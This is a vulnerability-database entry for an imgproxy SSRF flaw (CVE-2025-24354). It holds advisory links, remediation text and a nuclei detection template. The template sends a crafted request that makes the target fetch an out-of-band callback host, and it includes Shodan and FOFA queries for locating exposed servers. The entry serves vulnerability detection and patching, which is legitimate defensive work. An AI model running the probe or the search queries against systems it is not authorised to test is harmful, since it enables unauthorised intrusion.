Lucene search
K

Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 39 Views

Imgproxy before 3.27.2 allows SSRF via unblocked 0.0.0.0 exposure, exposing local services; fixed in 3.27.2.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-24354
27 Jan 202517:29
circl
CNNVD
imgproxy 代码问题漏洞
27 Jan 202500:00
cnnvd
CVE
CVE-2025-24354
27 Jan 202517:23
cve
Cvelist
CVE-2025-24354 imgproxy is vulnerable to SSRF against 0.0.0.0
27 Jan 202517:23
cvelist
EUVD
EUVD-2025-0172
3 Oct 202520:07
euvd
Github Security Blog
imgproxy is vulnerable to SSRF against 0.0.0.0
27 Jan 202520:50
github
NVD
CVE-2025-24354
27 Jan 202518:15
nvd
OpenVAS
openSUSE Security Advisory (SUSE-SU-2025:0297-1)
31 Jan 202500:00
openvas
OSV
CVE-2025-24354 imgproxy is vulnerable to SSRF against 0.0.0.0
27 Jan 202517:23
osv
OSV
GHSA-J2HP-6M75-V4J4 imgproxy is vulnerable to SSRF against 0.0.0.0
27 Jan 202520:50
osv
Rows per page
id: CVE-2025-24354

info:
  name: Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)
  author: oksuzkayra
  severity: medium
  description: |
    imgproxy contains an issue caused by not blocking the 0.0.0.0 address even when IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES is set to false, letting local services be exposed, exploit requires network access.
  impact: |
    Local services may be exposed to unauthorized access, risking information disclosure or local system compromise.
  remediation: |
    The vulnerability has been fixed in imgproxy version 3.27.2. The fix involves updating the source address verification to also check for unspecified IP addresses (0.0.0.0) using the ip.IsUnspecified() function in addition to the existing ip.IsLoopback() check.
  reference:
    - https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081
    - https://github.com/imgproxy/imgproxy/security/advisories/GHSA-j2hp-6m75-v4j4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-24354
    cwe-id: CWE-918
    epss-score: 0.00844
    epss-percentile: 0.53531
  metadata:
    verified: true
    max-request: 1
    product: imgproxy
    shodan-query: http.html:"imgproxy"
    fofa-query: body="imgproxy"
  tags: cve,cve2025,imgproxy,ssrf,oast,oob,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/unsafe/plain/http://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
          - "status_code == 422"
          - "contains(body, 'Invalid source image')"
        condition: and
# digest: 4b0a00483046022100c75450bab85934e1aaeab86a8e905df697fc96ce9a67331de83fe1a218220aec022100cf4fc7a5e0700da440d6d79aa1a07e2089a9657fa6137bd0f8bdc489ac6a1b4d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.15.3
EPSS0.00844
39